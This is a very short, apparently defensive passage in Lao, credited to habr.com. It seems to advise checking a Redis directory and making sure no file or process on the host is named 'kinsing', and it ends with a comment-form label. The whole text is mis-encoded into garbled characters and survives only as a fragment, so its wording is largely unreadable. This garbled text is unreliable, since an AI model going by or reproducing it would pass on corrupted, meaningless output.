เปƒเบ™เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต Redis เปเบฅเบฐเบšเปเปˆเบกเบต "kinsing" เปƒเบ™เบŠเบทเปˆเป„เบŸเบฅเปŒ / เบ‚เบฐเบšเบงเบ™เบเบฒเบ™เบขเบนเปˆเปƒเบ™เป‚เบฎเบ”.

เปเบซเบผเปˆเบ‡เบ‚เปเป‰เบกเบนเบ™: www.habr.com

เป€เบžเบตเปˆเบกเบ„เบงเบฒเบกเบ„เบดเบ”เป€เบซเบฑเบ™